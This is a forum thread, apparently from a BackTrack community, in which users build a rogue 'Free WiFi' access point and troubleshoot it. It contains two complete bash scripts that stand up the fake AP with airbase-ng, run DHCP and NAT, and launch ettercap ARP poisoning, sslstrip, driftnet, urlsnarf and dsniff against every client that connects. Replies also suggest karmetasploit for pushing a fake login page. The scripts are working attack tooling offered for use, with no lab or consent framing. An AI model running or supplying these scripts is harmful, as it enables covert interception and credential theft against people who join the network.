Lucafa's tutorial: softAP with internet connection and MITM sniffing

[ap/dc]

I can ping the host or call it softAP, I have internet on the host machine aka eth1. but still can't ping or surf... I have answered the questions you asked below:

ap/dc; what wireless card are you using? awus36h

A: Make sure you've got what's NEEDED(look at the beginning of my tutorial) checked

B: Try playing around with your wireless card's MTU values
(ifconfig wlan0 MTU 1400, 1500 or 1800, and ifconfig mon0 MTU 1400, 1500, or 1800, mess around with some combinations)
What is MTU values?

C: Maybe the MITM tools are causing you trouble. try again without them, do all the steps from 1 to 7, and leave this command out: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
I have not tried the MITM`n tools yet

D: If it still doesn't work and you happen to have got a second pc/laptop, repeat all tutorial's steps on this different machine to see if it helps. I've also got some problems with fake ap's on my laptop, it only works on my older pc.
I have not tried that yet

cheers,

[mikeyxb]

im trying to set up a fake ap with lucifers tutorial in the how to's and i need to know if i can get the client who connects to get there internet from my proxy connection, i currently use adb and my android phone for the connection on my copy of backtrack 4, i use proxoid to tether my connection and use adb command forward tcp:8080, but to use apt-get i have to use this command "export http_proxy=http://localhost:8080" in the konsole, if this sounds confusing believe me it was hard work to get it all done lol so if anyone has any easier suggestions that i can do to make it easier and get it to work with a fake ap, and also my package manager still thinks i dont have a connection when i clearly do lol

[Lucifer]

- In order for it to work, you will need to try out the stuff I suggested.
- What are MTU values? let me google that for you
- Start of by trying the whole tutorial on a different pc/laptop.
- If the same problem persists, then try my C suggestion, and when your fake ap is up (without the MITM tools), begin by changing at0 MTU to 1400 (ifconfig at0 MTU 1400) and see if it works. if it does not, play around with wlan0 and mon0 MTU. keep on trying untill it works.
- Report back when you've tried everything I suggested.

Good luck man,

[ap/dc]

I have tried experiencing with the mtu and tried two different computers, I am seeing that getting IP takes along time and when its ok I still got NO internet:\
Ihave have tried l3g10n`s tips but it fails on the " /var/run/dhcp3-server/dhcpd.pid " no such file/directory ... etc

See underneath

Cheers!

#!/bin/bash #-------------- - Wifi WMITM Attack - n3n4umxc - Pastebin.com

#----------------------------------------------------------------------#
# This script is what I have taken from a script I found on the old BT
# forums by Deathray. I modified it to fit my needs. -l3g10n
#----------------------------------------------------------------------#
echo -n "Enter the name of the interface connected to the internet, for example eth0: "
read -e IFACE
airmon-ng
echo -n "Enter your wireless interface name, for example wlan0: "
read -e WIFACE
echo -n "Enter the ESSID you would like your rogue AP to be called, for example Free WiFi: "
read -e ESSID
kill `cat /var/run/dhcp3-server/dhcpd.pid`
killall -9 dhcpd airbase-ng ettercap sslstrip driftnet urlsnarf
airmon-ng stop $WIFACE
ifconfig $WIFACE down
airmon-ng start $WIFACE
ifconfig $WIFACE up

modprobe tun

echo Airbase-ng is going to create our fake AP with the SSID we specified
xterm -e airbase-ng -e "$ESSID" -P -C 30 -v mon0 &

sleep 10

echo Configuring interface created by airdrop-ng
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1

echo 'Setting up iptables to handle traffic seen by the airdrop-ng (at0) interface'
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE

echo Creating a dhcpd.conf to assign addresses to clients that connect to us
echo "default-lease-time 600;" > dhcpd.conf
echo "max-lease-time 720;" >> dhcpd.conf
echo "ddns-update-style none;" >> dhcpd.conf
echo "authoritative;" >> dhcpd.conf
echo "log-facility local7;" >> dhcpd.conf
echo "subnet 10.0.0.0 netmask 255.255.255.0 {" >> dhcpd.conf
echo "range 10.0.0.100 10.0.0.254;" >> dhcpd.conf
echo "option routers 10.0.0.1;" >> dhcpd.conf
echo "option domain-name-servers 8.8.8.8;" >> dhcpd.conf
echo "}" >> dhcpd.conf

echo 'DHCP server starting on our airdrop-ng interface (at0)'
dhcpd3 -f -cf dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0 &
xterm -e tail -f /var/log/messages &
#echo 'Launching ettercap, poisoning all hosts on the at0 interface's subnet'
xterm -e ettercap -T -q -p -l ettercap$(date +%F-%H%M).log -i at0 // // &
sleep 8

echo 'Configuring ip forwarding'
echo "1" > /proc/sys/net/ipv4/ip_forward

echo 'Launching various tools'
xterm -e sslstrip -a -k -f &
driftnet -v -i at0 &
xterm -e urlsnarf -i at0 &
xterm -e dsniff -m -i at0 -d -w dsniff$(date +%F-%H%M).log &

[l3g10n]

I have tried experiencing with the mtu and tried two different computers, I am seeing that getting IP takes along time and when its ok I still got NO internet:\
Ihave have tried l3g10n`s tips but it fails on the " /var/run/dhcp3-server/dhcpd.pid " no such file/directory ... etc

See underneath

Cheers!

I always get that error....doesn't have an effect on the overall script. It's basically saying that it can't write the process id to a txt file. What is the output from the airbase-ng window?

[seanile]

Hi
great tut works just great
I have tried to get it to display a html page as a log in page and to warn that's it's insecure.
Have got the apache2 server running with address 127.0.1.1
entering 127.0.1.1 in browser on the attack machine i get the html page.
Tried adjusting ip tables to redirect but NO success. any help please.
Also how can I be alerted with a tone when a client attaches, I guess there is a sting I can monitor for attached clients.
thanks

[l3g10n]

Hi
great tut works just great
I have tried to get it to display a html page as a log in page and to warn that's it's insecure.
Have got the apache2 server running with address 127.0.1.1
entering 127.0.1.1 in browser on the attack machine i get the html page.
Tried adjusting ip tables to redirect but NO success. any help please.
Also how can I be alerted with a tone when a client attaches, I guess there is a sting I can monitor for attached clients.
thanks

You may want to check out karmetasploit if you want users to be directed to your webpage. There is a script that is included in BT to autolaunch it: /pentest/wireless/kmsapng/kmsapng.sh . As far as monitoring, you could watch /var/log/messages for DHCP assignments or airbase-ng for client associtaions to your fakeap.

[l3g10n]

I made some more tweaks to the script. Let me know if you have any issues.

WifiMITM-NEW.sh

Code:

#!/bin/bash
killall -9 dhcpd3 airbase-ng ettercap sslstrip driftnet urlsnarf tail 

echo 'Network Interfaces:'
ifconfig | grep Link
echo -n "Enter the name of the interface connected to the internet, for example eth0: "
read -e IFACE
airmon-ng
echo -n "Enter your wireless interface name, for example wlan0: "
read -e WIFACE
echo -n "Enter the ESSID you would like your rogue AP to be called, for example Free WiFi: "
read -e ESSID
airmon-ng stop $WIFACE
ifconfig $WIFACE down
airmon-ng start $WIFACE
ifconfig $WIFACE up

modprobe tun

#airbase-ng is going to create our fake AP with the SSID we specified
xterm -bg black -fg yellow -e airbase-ng -e "$ESSID" -P -C 30 -v mon0  &

sleep 10

echo Configuring interface created by airdrop-ng
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0 
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1

echo 'Setting up iptables to handle traffic seen by the airdrop-ng (at0) interface'
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE

echo Creating a dhcpd.conf to assign addresses to clients that connect to us
echo "default-lease-time 600;" > dhcpd.conf
echo "max-lease-time 720;"  >> dhcpd.conf
echo "ddns-update-style none;" >> dhcpd.conf
echo "authoritative;"  >> dhcpd.conf
echo "log-facility local7;"  >> dhcpd.conf
echo "subnet 10.0.0.0 netmask 255.255.255.0 {"  >> dhcpd.conf
echo "range 10.0.0.100 10.0.0.254;"  >> dhcpd.conf
echo "option routers 10.0.0.1;"  >> dhcpd.conf
echo "option domain-name-servers 8.8.8.8;"  >> dhcpd.conf
echo "}"  >> dhcpd.conf

echo 'DHCP server starting on our airdrop-ng interface (at0)'
dhcpd3 -f -cf dhcpd.conf at0 &
echo "Launching DMESG"
xterm -bg black -fg red -e tail -f /var/log/messages &
echo "Launching ettercap, poisoning all hosts on the at0 interface's subnet"
xterm -bg black -fg blue -e ettercap -T -q -p -l ettercap$(date +%F-%H%M).log -i at0 // // &
sleep 8

echo 'Configuring ip forwarding'
echo "1" > /proc/sys/net/ipv4/ip_forward

echo 'Launching various tools'
sslstrip -a -k -f &
driftnet -v -i at0 &
xterm  -bg black -fg green -e urlsnarf  -i at0 &
dsniff -m -i at0 -d -w dsniff$(date +%F-%H%M).log &

[kafteras]

Thx l3g10n. Its working rly nice..
Just 1 prob is this:

Can't create PID file /var/run/dhcpd.pid: Permission denied.

The change here i suppose break it somehow?

dhcpd3 -f -cf dhcpd.conf at0 &

And i like the colors but the blue of ettercap is making it difficult to read.

[ap/dc]

thnx for the script legion! I'm very close now! >) I can connect, I get IP & I can also ping web sites. But I cant surf. Is there any settings in the script i need to configure?